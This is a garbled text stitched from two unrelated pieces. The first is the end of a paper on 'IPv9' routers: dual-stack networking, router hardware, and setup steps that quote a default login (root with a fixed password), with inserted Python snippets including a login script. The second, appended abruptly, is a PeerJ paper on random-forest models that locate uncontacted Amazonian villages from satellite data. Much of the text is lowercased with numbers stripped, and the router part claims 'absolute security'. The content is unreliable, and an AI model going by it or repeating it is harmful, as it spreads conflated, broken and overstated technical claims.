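    def decapsulate(outer_packet: bytes) -> bytes:
        """At the tunnel exit: strip the outer header, return the inner packet."""
        ihl_words = outer_packet[0] & 0x0F
        return outer_packet[ihl_words * 4:]

    inner = b"\x60" + b"\x00" * 39          # placeholder for an inner datagram
    tunnelled = encapsulate(inner, b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02")
    assert decapsulate(tunnelled) == inner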
B. Double stack technique

Dual stack means that a single node supports both the IPv4 and IPv6 protocol stacks at the same time. Such a node can communicate directly with IPv4 nodes using the IPv4 protocol, or with IPv6 nodes using the IPv6 protocol, so it can serve as a connection point between the IPv4 and IPv6 networks; this is the IPv4/IPv6 node mentioned earlier. Since the new protocol mainly changes the network-layer part of the original stack, while the transport layer and the layers above it remain essentially unchanged, IPv4/IPv6 nodes are usually implemented with a double IP layer structure, as shown in the figure.

Figure: Double IP layer structure — the application layer protocols and TCP/UDP sit above the IPv4 and IPv6 protocols side by side, which in turn sit above the network interface layer.

For a router, however, the changes to the IP protocol are large and the IP routing protocols change correspondingly, so a "dual stack" router is a router that maintains both protocol stacks in one device. Such a router can communicate with IPv4 hosts and with IPv6 hosts, supports independent IPv4 and IPv6 routing protocols, computes IPv4 and IPv6 routing information with the respective protocols, and maintains a separate routing table for each. IPv4 datagrams are forwarded according to the routing table produced by the IPv4 routing protocols, and IPv6 datagrams according to the table produced by the IPv6 routing protocols. The protocol structure of a router supporting both stacks is shown in the figure.

Figure: Protocol structure of a dual stack router — RIP and BGP alongside RIPng and BGP4+, above TCP/UDP, the IPv4 and IPv6 protocols, and the physical network.

A network using dual-stack technology has no interworking problem, which is convenient. However, it requires an IPv4 address to be assigned to every IPv6 node, which aggravates the strain on IPv4 address resources. In addition, every IPv4/IPv6 node must run two protocol stacks at the same time, keep two sets of commands, and compute, maintain and store two sets of table entries, while gateway devices must additionally translate and re-encapsulate messages between the two stacks; this increases the load on every node and places higher demands on node performance. Finally, the DNS servers on a dual-stack network must also support mapping host domain names to IPv6 addresses.
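At the end-system level, the dual-stack idea shows up directly in the sockets API: one process opens a listening socket per protocol family and serves clients arriving over either. The minimal sketch below does exactly that for IPv4 and IPv6 in Python; it illustrates the node-level concept only and contains nothing IPv9-specific, since standard socket libraries do not support IPv9. Setting IPV6_V6ONLY keeps the two stacks cleanly separated, mirroring the two independent routing tables maintained by the dual-stack router described above.

    import selectors
    import socket

    sel = selectors.DefaultSelector()

    def make_listener(family, addr):
        s = socket.socket(family, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        if family == socket.AF_INET6:
            # Keep the IPv6 socket IPv6-only so the IPv4 socket can share the port.
            s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
        s.bind(addr)
        s.listen()
        s.setblocking(False)
        sel.register(s, selectors.EVENT_READ)
        return s

    make_listener(socket.AF_INET, ("0.0.0.0", 8080))   # IPv4 stack
    make_listener(socket.AF_INET6, ("::", 8080))       # IPv6 stack

    while True:
        for key, _ in sel.select():
            conn, peer = key.fileobj.accept()
            conn.sendall(b"hello from the dual-stack node\n")
            conn.close()
            print("served", peer)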
III. Introduction to IPv9 routing equipment

With the expansion of the new-generation Internet routing system in China, it has been deployed in Beijing, Shanghai, Chongqing, the Northeast, Sichuan, Xinjiang, Shandong, Guangdong, Zhejiang, Hong Kong, Macao and elsewhere. Manual configuration of addresses and routes can no longer keep pace with this development; its inefficiency and complexity have been exposed step by step. To cope with the management and configuration of this large number of routing nodes, an efficient and automated configuration system is needed to handle the allocation and configuration management of new-generation Internet addresses.

A. Megabit router

The complete megabit router, shown in the figure, consists of the main unit and two signal antennas.

Figure: The whole machine.

The panel of the router, shown in the figure, carries the network connection indicator, the WiFi signal indicator, the USB connection indicator and the power indicator.

Figure: The panel.

The indicator lights behave as follows: a steady red power light means the power supply is normal; a flashing blue WAN light means the WAN link is normal; a flashing blue LAN light means the LAN is normal; a flashing blue WiFi light means WiFi is normal; and a flashing blue USB light means USB is normal. The lights are summarized in the table below.

Table: Indicator lights
  Indicator   Behaviour              Meaning
  Power       Red light on           Power supply normal
  WAN         Blue light flashing    WAN normal
  LAN         Blue light flashing    LAN normal
  WiFi        Blue light flashing    WiFi normal
  USB         Blue light flashing    USB normal

The front panel, shown in the figure, provides a USB interface and a TF card slot. The USB interface can be used to connect a USB mouse, keyboard, USB disk and other devices; the TF card slot accepts a TF card.

Figure: Front panel.

The back panel, shown in the figure, provides a DC port for connecting the power supply to the router; note that using a mismatched power supply can damage the router. The Reset button restarts the device when pressed briefly; pressing and holding it for several seconds restores the factory default settings. When the system status indicator changes from slow to fast flashing, the router has been restored to the factory settings; release the Reset button and the router will restart. The WAN port is the jack for the upstream Ethernet cable. The LAN ports (LAN1–LAN4) are jacks for connecting a hub, a switch, or a computer with a network card on the local network.

Figure: Back panel.

B. Gigabit router

The complete gigabit router, shown in the figure, consists of the main unit and six signal antennas: four 2.4 GHz antennas and two 5 GHz antennas.

Figure: The whole machine.

The front panel is shown in the figure. The back panel has a power port for connecting the power supply; as with the megabit model, a mismatched power supply can damage the router. The Reset button likewise restarts the device when pressed briefly and restores the factory defaults when held for several seconds, indicated by the system status light changing from slow to fast flashing, after which the router restarts. The WAN port takes the upstream Ethernet cable, and the LAN ports (LAN1–LAN4) connect a hub, switch or computer on the local network. The USB interface can be used to connect a USB mouse, keyboard, USB disk and other devices, and the TF card slot accepts a TF card.

IV. IPv9 routing setup procedures and methods

A. Login to the router configuration interface

Enter the router's management address in the browser address bar, as shown in the browser login figure, and press Enter to reach the system login interface. In the system login interface, enter the default user name root and the default password shsjzwlxxkjyxgs, then click the Login button; the overview interface appears.

Figure: Front panel. Figure: Browser login. Figure: System login interface. Figure: IPv9 overview interface.
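The login procedure above can also be scripted, which is convenient when several routers have to be checked. The sketch below only illustrates the general pattern — POST the credentials, then fetch the page that follows a successful login. The management address is a placeholder because the source elides it, and the login path and form field names are assumptions, since the paper does not describe the web interface beyond the default account.

    import requests

    ROUTER_ADDR = "192.168.1.1"   # placeholder: the manual's default address is elided
    LOGIN_URL = f"http://{ROUTER_ADDR}/login"   # assumed path; depends on the firmware
    USERNAME = "root"                            # default user name from the manual
    PASSWORD = "shsjzwlxxkjyxgs"                 # default password quoted in the manual

    session = requests.Session()

    # Step 1: post the credentials, as the browser's login form would.
    # The field names "username"/"password" are assumptions for illustration.
    resp = session.post(LOGIN_URL,
                        data={"username": USERNAME, "password": PASSWORD},
                        timeout=5)
    resp.raise_for_status()

    # Step 2: request the overview page that appears after a successful login
    # (path again assumed).
    overview = session.get(f"http://{ROUTER_ADDR}/overview", timeout=5)
    print("logged in, overview page size:", len(overview.text))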
the enterprise router manually assigns the address, and one enterprise account can register multiple devices. before international journal of advanced network, monitoring and controls volume , no. , you register, you need to send the sms verification code and enter the sms verification code. ) click the menu ipv drop-down key to select the user registration function. ) enter the user name, password, confirmation password, registration type, real name, certificate type, certificate number, e-mail, mobile phone, enterprise name, address, postal code and remarks according to the text prompt of user registration. ) enter your phone number and click the send button on the right. ) after the phone receives the verification code, fill in the verification code. ) click the user registration button below. figure . ipv overview interface c. equipment registration when the individual user registers the device, not only the device information is registered, but also the ipv /ipv address is automatically assigned to the device, while the enterprise user only registers the device information. the device registration is shown in figure . ) click the menu ipv drop-down button to select the device registration function. ) choose your city. international journal of advanced network, monitoring and controls volume , no. , ) click the device registration button below. d. configuration of wifi click the network to select wifi and enter the wifi configuration interface. in figure , you can see the working state of wifi. if you need to modify the configuration of wifi, click modify. modify the name of wifi as shown in figure . figure . ipv user device registration figure . configuration of wifi international journal of advanced network, monitoring and controls volume , no. , figure . ipv user device registration configure the device wifi encryption method. generally, it is recommended to use the encryption mode shown(wpa_psk/wpa -psk mixed mode) above to enter the new password and click "save & apply" button. this is the normal router setup, after which a new router is configured. the encryption configuration is shown in figure . figure . encryption configuration international journal of advanced network, monitoring and controls volume , no. , v. ipv and g movie transmission system able movie network issuance application of beijing unicom g network and china mobile company in suzhou g network has already passed the beijing university of posts and telecommunications able fiber routing backbone nodes and able backbone fiber optic cable connected directly across the country, and on may , , the first in the world at mbps end-to-end to mbps speed, in local access able the national backbone network, successfully carried out the digital film distribution network (each film data capacity in hundreds of gb or so). the national online distribution of chinese films was the first in the world to enter the new era of "one hour", and the intelligent cinema based on ipv address was realized. the ipv /ipv router is a dual protocol stack router. by building this dual protocol stack router, the ipv network can be realized and the ipv network can be compatible with ipv , thus achieving a good transition from ipv to ipv . 
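as a loose illustration of the dual-stack behaviour summarized above (one router holding two independent protocol stacks, each maintaining its own routing table, and forwarding every datagram with the stack that matches its version), here is a minimal sketch. the class, the toy routing tables, and the use of ipv4/ipv6 addresses from python's standard ipaddress module are placeholders chosen only to show the per-family lookup; this is not an implementation of the routers discussed in this paper.

```python
import ipaddress

class DualStackRouter:
    """toy model of a dual-stack router: one routing table per protocol family."""

    def __init__(self):
        # each stack keeps its own independently maintained routing table
        self.tables = {4: {}, 6: {}}

    def add_route(self, prefix, next_hop):
        net = ipaddress.ip_network(prefix)
        self.tables[net.version][net] = next_hop

    def forward(self, dst):
        """look up the destination in the table that matches its ip version."""
        addr = ipaddress.ip_address(dst)
        table = self.tables[addr.version]
        # longest-prefix match within the selected stack only
        matches = [net for net in table if addr in net]
        if not matches:
            raise LookupError(f"no route to {dst}")
        best = max(matches, key=lambda net: net.prefixlen)
        return table[best]

router = DualStackRouter()
router.add_route("203.0.113.0/24", "gateway-a")
router.add_route("2001:db8::/32", "gateway-b")
print(router.forward("203.0.113.7"))   # forwarded by the first stack
print(router.forward("2001:db8::1"))   # forwarded by the second stack
```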
through the configuration of different interfaces of routers, the conversion between different protocols can be realized to realize the data transmission of pure ipv protocol packet, ipv over ipv and ipv over ipv , while ipv over ipv and ipv over ipv are realized by tunnel technology, which is an important way to realize the intercommunication between ipv and ipv networks. a. ipv private network transmission figure shows the transmission of pure ipv private network. an ipv and ipv router is directly set up in the state administration of film and the cinema, which is connected through the ipv private network. the router interface is configured as the ipv transmission mode, so the line between the state administration of film and the cinema is the pure ipv protocol transmission. the network between the two is full of ipv protocol packets, which can guarantee absolute security. figure . ipv private network transmission b. ipv private network tunnel transmission ipv over ipv , ipv /ipv router can be compatible with ipv network, namely ipv packets can be transmitted on the able private network, realize the ipv over able, to design a scheme of transmission as shown in figure . both ends set up double protocol stack router, the router for private network between. the advantage is the backbone adopts able transmission protocol, security can get reliable guarantee. international journal of advanced network, monitoring and controls volume , no. , figure . private network tunnel transmission the transmission process of ipv based ipv packets is as follows: ) router i received ipv packets from the ipv network. ) router encapsulates ipv packets in ipv message. the source address and destination address of ipv message correspond to the entrance address and exit address of the tunnel respectively, that is, the ipv address of router and router . ) the encapsulated ipv packets are transmitted along and through the marked tunnel link, routed to the ipv address, and arrive at the destination router to complete the transmission of ipv private network line. ) router receives the ipv packet from router , unseals the ipv packet to obtain the original ipv packet, and then sends it out. vi. conclusion with the development of the internet and the increasing number of internet users, the shortage of ip address resources has become a bottleneck restricting its development. the application of ipv is spreading in china, especially in the government, banks and other sectors. ipv has a large address capacity, is compatible with ipv and ipv , and uses special encryption mechanisms to make the network environment more secure. this paper discusses the ipv address architecture and the digital domain name system, discusses the different network access technologies in detail, introduces the megabit and gigabit routers that support the use of new networks, and discusses the configuration methods of routers in detail. this paper analyzes the film transmission system of beijing university of posts and telecommunications at the network level, which is very important for the future deployment of ipv network. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] v. fuller, t. li,network working group. classless inter-domain routing (cidr): an address assignment and aggregation strategy, rfc- , . . [ ] kohler e, li j, paxson v, et al. 
observed structure of addresses in ip traffic [j]. ieee/acm transactions on networking, , ( ): - . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] xie jianping etc. digital domain name specification, sj/t - , . . [ ] m. crawford. network working group.transmission of ipv packets over ethernet networks.rfc- , . . submitted october accepted december published january corresponding author robert s. walker, walkerro@missouri.edu academic editor barbara pes additional information and declarations can be found on page doi . /peerj-cs. copyright walker and hamilton distributed under creative commons cc-by . open access machine learning with remote sensing data to locate uncontacted indigenous villages in amazonia robert s. walker and marcus j. hamilton , department of anthropology, university of missouri, columbia, mo, usa department of anthropology, university of texas at san antonio, san antonio, tx, usa santa fe institute, santa fe, nm, usa abstract background. the world’s last uncontacted indigenous societies in amazonia have only intermittent and often hostile interactions with the outside world. knowledge of their locations is essential for urgent protection efforts, but their extreme isolation, small populations, and semi-nomadic lifestyles make this a challenging task. methods. remote sensing technology with landsat satellite sensors is a non-invasive methodology to track isolated indigenous populations through time. however, the small-scale nature of the deforestation signature left by uncontacted populations clear- ing villages and gardens has similarities to those made by contacted indigenous villages. both contacted and uncontacted indigenous populations often live in proximity to one another making it difficult to distinguish the two in satellite imagery. here we use machine learning techniques applied to remote sensing data with a training dataset of contacted and uncontacted villages. results. uncontacted villages generally have smaller cleared areas, reside at higher elevations, and are farther from populated places and satellite-detected lights at night. a random forest algorithm with an optimally-tuned detection cutoff has a leave- one-out cross-validated sensitivity and specificity of over %. a grid search around known uncontacted villages led us to identify three previously-unknown villages using predictions from the random forest model. our efforts can improve policies toward isolated populations by providing better near real-time knowledge of their locations and movements in relation to encroaching loggers, settlers, and other external threats to their survival. subjects data mining and machine learning, spatial and geographic information systems keywords random forest, satellite imagery, south america, indigenous societies introduction the ongoing colonization of amazonia has brought waves of epidemics and violence for centuries with severe consequences for indigenous populations (bodard, ; hemming, ; hurtado et al., ; hamilton, walker & kesler, ). amazingly, despite all the external pressures, remote areas in the upper amazon watershed still support a number of remnant indigenous societies generally referred to as uncontacted or isolated populations (vaz, ; castillo, ; ricardo & ricardo, ). despite these labels, intermittent and often hostile interactions with the outside world are commonplace (wallace, ). most how to cite this article walker rs, hamilton mj. . 
machine learning with remote sensing data to locate uncontacted indigenous vil- lages in amazonia. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:walkerro@missouri.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. governmental and non-governmental organizations promote no-contact policies for these isolated indigenous populations with the belief that they are safest if left to themselves (walker & hill, ). however, encroachment from loggers, miners, settlers, and others is incessant and uncontacted societies represent the world’s most critically endangered cultures (walker, kesler & hill, ). there is a need for good information on their locations and movements in hopes of improving their survival prospects moving forward. our project is part of a longitudinal remote surveillance program to conduct scientific studies of indigenous demography and spatial ecology to facilitate informed decisions by policy makers that will increase protection efforts for isolated indigenous populations (walker & hamilton, ; walker, hamilton & groth, ). our central goal is to gather as much information on isolated indigenous populations as possible without attempting any direct contact (kesler & walker, ). we maximize the use of available technologies to gather data remotely with no interference. satellite imagery offers a safe, low-cost, and noninvasive method for studying population dynamics and spatial ecology of indigenous populations (walker, kesler & hill, ). similarly important is the need to understand spatial resource needs of indigenous societies in a region heavily impacted by deforestation, as well as the potential importance of connections among subpopulations, known to contribute to population viability (levins, ; hanski, ). the irreversible threats from large-scale habitat loss via deforestation and conversion of land to agriculture and pasture paint a bleak future for uncontacted populations (fagan & shoobridge, ; salisbury & fagan, ; walker, kesler & hill, ). the hope is that better data and methods can contribute improvements to this complex issue. applied machine learning is a vital tool for conservation work as a means to both collect and analyze more data at faster rates (murray et al., a). the growing use of machine learning methods to analyze large sets of biological, biophysical, spectral and climatological data has enabled accurate differentiation of the world’s landscapes (pettorelli et al., ). more germane to our work are forest classification projects (hansen et al., ; murray et al., b). the global forest change dataset was developed by classifying pixels using or more high-resolution global composite images as predictors, each developed from over , landsat images (hansen et al., ). the random forest algorithm is known to give excellent classification results and relatively quick processing speed (du et al., ; pal, ; rodriguez-galiano et al., ). random forests (breiman, ) are an ensemble supervised learning method that builds multiple decisions trees used here for the classification of village class (uncontacted versus contacted). random forests operate by constructing a multitude of decision trees. 
some of the advantages of random forests are that they are robust to inclusion of features that are irrelevant to classification, and they are invariant to transformations of feature variables (belgiu & drăguţ, ). for these reasons, the random forest algorithm is popular for remote sensing data given its accuracy, speed, and ability to handle high data dimensionality and multicollinearity. walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. materials & methods data we combined the exact locations (centroids) of uncontacted and contacted indigenous villages (walker, kesler & hill, ). more information about our general project along with high-resolution imagery for uncontacted villages is available at https://isolatedtribes.missouri.edu. the locations of uncontacted villages were originally derived from scouring high-resolution imagery using a combination of undergraduate helpers and various maps made by governmental and non-governmental agencies in colombia, ecuador, peru and especially brazil. several additional locations have been pieced together from governmental reports and news stories stemming from overflights. contacted villages are from the brazilian government website (http://www.funai.gov.br/), and we included all of those that were in western amazonia (west of degrees longitude, fig. ). hansen and colleagues’ ( ) global forest change (gfc) project provides small-scale deforestation at approximately m resolution from landsat sensors extending back to the year . gfc version . goes up through the year . we extracted the amount of detected deforestation in × km squares surrounding each village’s centroid and took the maximum area cleared in any one particular year from across the -year period. we refer to this measure as cleared area as it includes both the village and associated gardens but not those of neighboring villages. in addition, our dataset has other features, including regional population density in the nearest square km (ciesin, ), elevation at m digital resolution from the space shuttle radar topography mission (rabus et al., ), and distance to populated places at m resolution (balk et al., ). we also included a local lights-at-night measure at km resolution (pritchard, , from https://earthobservatory.nasa.gov) using the distance from village centroid to the nearest detected lights. finally, distance to rivers of all the different strahler stream orders using the global self-consistent, hierarchical, high-resolution geography database (wessel & smith, ), along with the minimum distance to combined rivers of strahler stream orders , , and , giving a total of features used to train algorithms. models machine learning algorithms were performed with the r package caret. we found that an untuned random forest algorithm had a fairly high combination of sensitivity (true positive rate) and specificity (true negative rate) in the . to . range. as mentioned above, random forest algorithm is an ensemble classifier that produces multiple decision trees, using a randomly selected subset of training samples and variables. other algorithms such as neural networks, extreme gradient boosting tree, and lasso logistic regression were also relatively-high performing but gave slightly lower values on one or the other metric. the target classes in our sample are imbalanced with only . % of villages in the sample being uncontacted. 
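before moving on to the cutoff tuning described next, here is a small sketch of the cleared-area feature defined in the data subsection above: the maximum deforestation detected in any single year inside a fixed window around a village centroid. the array layout, the "lossyear"-style encoding, the pixel area, and the window size are illustrative assumptions, not the authors' actual extraction code.

```python
import numpy as np

def max_annual_cleared_area(loss_year, pixel_area_ha, row, col, half_window):
    """maximum area (ha) cleared in any single year inside a square window.

    loss_year: 2-d integer array in the style of the global forest change
    'lossyear' layer, where 0 means no detected loss and k > 0 means loss
    first detected in year k.
    """
    window = loss_year[row - half_window: row + half_window + 1,
                       col - half_window: col + half_window + 1]
    years = np.unique(window[window > 0])
    if years.size == 0:
        return 0.0
    # area cleared per year = number of loss pixels for that year * pixel area
    per_year = [(window == y).sum() * pixel_area_ha for y in years]
    return float(max(per_year))

# synthetic example: a 300 x 300 pixel tile, ~0.09 ha per 30 m landsat pixel
rng = np.random.default_rng(0)
tile = rng.choice([0, 5, 12], size=(300, 300), p=[0.995, 0.003, 0.002])
print(max_annual_cleared_area(tile, pixel_area_ha=0.09, row=150, col=150, half_window=100))
```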
during model training we noticed that varying the detection cutoff (also known as the threshold) that classifies villages into one class or the other had large effects on the results (the default cutoff is . majority rule). in addition, common loss metrics such as the area under the roc curve or the f score tended to give either high specificity or sensitivity with our data, but not both. to address the imbalanced data issue and improve model performance, we used a random forest algorithm that iteratively tuned the cutoff value so as to simultaneously maximize both specificity (true negative rate) and sensitivity (true positive rate). in other words, we instituted cost-sensitive learning into the random forest (elkan, ; zadrozny, langford & abe, ; khoshgoftaar, golawala & hulse, ). the loss metric we used for training is the distance from a perfect model with a sensitivity of 1 and a specificity of 1. we used , trees with variables available for splitting at each tree node. to evaluate models we used a leave-one-out cross-validation (non-nested) looped over a range of cutoffs from . to . in increments of . . raising the cutoff value means a higher level of evidence (i.e., more decision trees out of the total , trees that comprise the random forest) is needed to assign the positive class (uncontacted), so it decreases sensitivity and increases specificity. here a sensitive cutoff of . yields a minimal distance metric and the desired combination of high sensitivity and specificity metrics (fig. ).

figure: map of study locations. map of contacted indigenous villages in brazil and uncontacted indigenous villages in brazil, colombia, ecuador, and peru that were included in the study.

figure: model metrics obtained from training the random forest model with leave-one-out cross-validation across a range of cutoffs from . to . in increments of . . raising the cutoff value means a higher level of evidence is needed to assign the positive class (uncontacted), which decreases sensitivity (true positive rate) and increases specificity (true negative rate). here the optimal cutoff ( . ) gives a perfect cross-validated sensitivity of . and a specificity of . . the distance is the distance from a perfect model, which is minimized during training.

results

our random forest algorithm, with an optimally-tuned cutoff of . , yields a sensitivity of . and a specificity of . using leave-one-out cross-validation. this means that all uncontacted villages are correctly classified and % of the contacted villages are correctly classified. therefore, our model has a strong ability to automatically distinguish between contacted and uncontacted villages.
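a minimal sketch of the cutoff-tuning procedure described above, written with scikit-learn rather than the r caret package used by the authors: leave-one-out cross-validated class probabilities are swept over a grid of cutoffs, and the cutoff minimizing the distance from a perfect model (sensitivity 1, specificity 1) is kept. the synthetic data, the number of trees, and the cutoff grid are placeholders.

```python
import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import LeaveOneOut, cross_val_predict

# synthetic imbalanced data standing in for the village feature table;
# class 1 plays the role of "uncontacted"
X, y = make_classification(n_samples=120, n_features=12, weights=[0.9, 0.1],
                           random_state=0)

rf = RandomForestClassifier(n_estimators=500, random_state=0)
# out-of-sample probability of the positive class for every village
proba = cross_val_predict(rf, X, y, cv=LeaveOneOut(), method="predict_proba")[:, 1]

best = None
for cutoff in np.arange(0.05, 0.51, 0.01):
    pred = (proba >= cutoff).astype(int)
    sensitivity = (pred[y == 1] == 1).mean()   # true positive rate
    specificity = (pred[y == 0] == 0).mean()   # true negative rate
    # loss = distance from the perfect model (sensitivity = specificity = 1)
    dist = np.hypot(1 - sensitivity, 1 - specificity)
    if best is None or dist < best[0]:
        best = (dist, cutoff, sensitivity, specificity)

print("cutoff %.2f -> sensitivity %.2f, specificity %.2f" % best[1:])
```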
in order of descending variable importance, uncontacted villages have (1) smaller cleared areas, (2) longer distances from lights, (3) higher elevation, (4) longer distances to populated places, (5) lower regional population density, (6) longer distances from rivers of all strahler stream orders up to and including , and (7) shorter distances to rivers of levels and . figure shows density plot comparisons for the top four features in terms of variable importance.

figure: smoothed kernel density plots comparing uncontacted to contacted indigenous villages. the top four distinguishing features in terms of variable importance in the random forest model are that uncontacted villages have (a) smaller cleared areas, (b) farther distances to satellite-detected lights at night, (c) higher elevation, and (d) farther distances to populated places, on average. a and c are best visualized on log scales.

given the success of our algorithm during cross-validation, we then moved to implement it for predictive purposes. we did a grid search of all × km squares within a km radius of the five clusters of known uncontacted villages (fig. ). this approach does produce a high number of false positives created by natural clearings (e.g., landslides, windfalls, etc.). fortunately, most natural clearings can be eliminated by simply removing all clearings that are less than . ha. this left us with a sample of clearings. we were able to obtain high-resolution imagery for eight of these, and three contained newly-identified villages. one of these, in colombia, appears to be currently inhabited given that it has a single longhouse structure and shows recently made clearings in global land analysis and discovery (glad, tyukavina et al., ). the glad alert system processes landsat imagery as it becomes available to identify tree cover change in near real-time. this is an invaluable system for monitoring both recent activity by uncontacted villages and encroaching deforestation from outsiders. the other two newly-discovered sites are historical villages. one is from the uncontacted yanomami in northern brazil, inhabited from around year or earlier and until . the other is from pano speakers on the border between peru and brazil and was probably inhabited during a similar time period. the other five possible locations identified by the random forest predictions with high-resolution imagery available all appeared to be natural. therefore, we estimate our testing precision with this small sample as . (three true positives divided by eight total cases).

discussion

we used deforestation data from landsat satellites to train algorithms to identify the locations of uncontacted indigenous groups in amazonia as part of an ongoing effort to better understand their conservation status and threats. our results show that uncontacted villages have smaller cleared areas, reside at higher elevations, and are farther from populated places and satellite-detected lights at night.
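the grid-search and filtering step described above (scoring every candidate square near known clusters, discarding small clearings that are likely natural, and inspecting the strongest candidates in high-resolution imagery) can be sketched as follows. the probability cutoff, the minimum-area threshold, and the synthetic scores are placeholders; only the precision arithmetic (three confirmed villages out of eight inspected sites) comes from the text.

```python
import numpy as np

def shortlist_candidates(proba, cleared_ha, coords, cutoff=0.2, min_cleared_ha=0.5):
    """keep candidate squares whose predicted probability of holding an
    uncontacted village exceeds the cutoff and whose cleared area is large
    enough to rule out most natural clearings (landslides, windfalls, etc.)."""
    keep = [(p, xy) for p, a, xy in zip(proba, cleared_ha, coords)
            if p >= cutoff and a >= min_cleared_ha]
    return sorted(keep, reverse=True)    # inspect the strongest candidates first

# synthetic model scores for a handful of candidate grid squares
proba      = np.array([0.05, 0.40, 0.75, 0.30, 0.90])
cleared_ha = np.array([0.20, 1.10, 0.30, 2.50, 4.00])
coords     = [(-7.1, -73.9), (-7.2, -73.8), (-7.3, -73.7), (2.1, -70.4), (2.2, -70.5)]
print(shortlist_candidates(proba, cleared_ha, coords))

# testing precision = confirmed villages / candidate sites inspected with imagery
print("precision:", 3 / 8)
```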
our random forest algorithm with an optimally-tuned cutoff has cross-validated performance metrics of over %. the case of the uncontacted yanomami (also known as the moxihatetea) is a good example of the importance of a near real-time monitoring system. their previous village was abandoned in late and the brazilian indigenous agency (funai) and the yanomami indigenous association (hutukara) were particularly worried that some disaster had befallen them since much of the nearby area has seen invasions by gold miners. for a year and a half their whereabouts were unknown. we began looking for them using landsat data, but it was the remote sensing fire alerts (firms, davies et al., ) that first alerted us to their exact location. we tasked a digitalglobe satellite image on may , and were relieved to find out that they were alive and well and clearing large gardens. the number of sections in their shabono village structure had increased from to . we relayed this information on to funai and hutukara who then organized a flyover to officially confirm the location. remote sensing provides many advantages over flyovers, and we actually do not recommend them. as we have shown, the information provided solely by remote sensing is sufficient to identify uncontacted villages. remote sensing is safe, low-cost, and noninvasive, while flyovers are not. population estimates are also crucial information for assessing trends in the demographic health of isolated populations by measuring areas of fields, villages, and houses in satellite imagery. heads-up digitization of satellite imagery provides better population estimates than do flyovers where most people are not visible because many hide or run away in fear. remote sensing offers the benefits of time-stamped evidence of occupation of areas inhabited by isolated populations, along with movements through time (walker, kesler & hill, ). walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusions a dozen easily obtainable remote sensing measures allowed our random forest algorithm to successfully classify uncontacted versus contacted villages. extending the algorithm to make predictions in a grid search greatly accelerates our ability to find and identify the locations of uncontacted villages. moving forward we anticipate using an even lower cutoff value because the decreasing costs in satellite imagery make false positives from a more sensitive algorithm relatively cheap to evaluate and discard. we anticipate that this method will become the primary means by which to track and locate these same uncontacted villages, as well as undiscovered locations of uncontacted villages. one shortcoming of our classification model when applied to searching through unlabeled satellite imagery is that it was not designed to classify natural landslides, windfalls, or riverbank clearings. all of these natural processes also create deforestation signatures that further complicate our searches. future work could well include these, but in the meantime we filter our predictions based on cleared area because natural clearings tend to be less than . ha while most uncontacted villages have larger areas than that. our research is vital and timely as isolated groups are among the last remaining small- scale subsistence populations living in a traditional lifestyle. the enormous and mounting pressure from external threats create the possibility that isolated populations will disappear in the near future. 
better monitoring and tracking with remote sensing are tools that might provide more informed conservation decisions concerning increased protection and land rights for the world’s most critically-endangered human cultures. acknowledgements we thank mark flinn and the comparative methods course at the university of missouri for their help and suggestions. additional information and declarations funding this work was supported by a national geographic society research and exploration grant (# - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national geographic society research and exploration grant: # - . competing interests the authors declare there are no competing interests. author contributions • robert s. walker and marcus j. hamilton conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the raw remote sensing variables are available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references balk dl, deichmann u, yetman g, pozzi f, hay si, nelson a. . determining global population distribution: methods, applications and data. advances in parasitology : – doi . /s - x( ) - . belgiu m, drăguţ l. . random forest in remote sensing: a review of applications and future directions. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . bodard l. . green hell: massacre of the brazilian indians. new york: dutton. breiman l. . random forests. machine learning : – doi . /a: . castillo bh. . indigenous peoples in isolation in the peruvian amazon. copenhagen: international work group for indigenous affairs. center for international earth science information network (ciesin). . gridded population of the world: population density grid. palisades: columbia university, centro internacional de agricultura tropical. davies dk, ilavajhala s, wong mm, justice co. . fire information for resource management system: archiving and distributing modis active fire data. ieee trans- actions on geoscience and remote sensing : – doi . /tgrs. . . du p, samat a, waske b, liu s, li z. . random forest and rotation forest for fully polarized sar image classification using polarimetric and spatial features. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . elkan c. . the foundations of cost-sensitive learning. proceedings of the ieee international joint conference on artificial intelligence : – . fagan c, shoobridge d. . an investigation of illegal mahogany logging in peru’s alto national park and its surroundings’. durham: parkswatch. hamilton mj, walker rs, kesler d. . crash and rebound of indigenous populations in lowland south america. scientific reports ( ) doi . /srep . hansen mc, potapov pv, moore r, hancher m, turubanova sa, tyukavina a, thau d, stehman sv, goetz sj, loveland tr, kommareddy a. . high- resolution global maps of st-century forest cover change. 
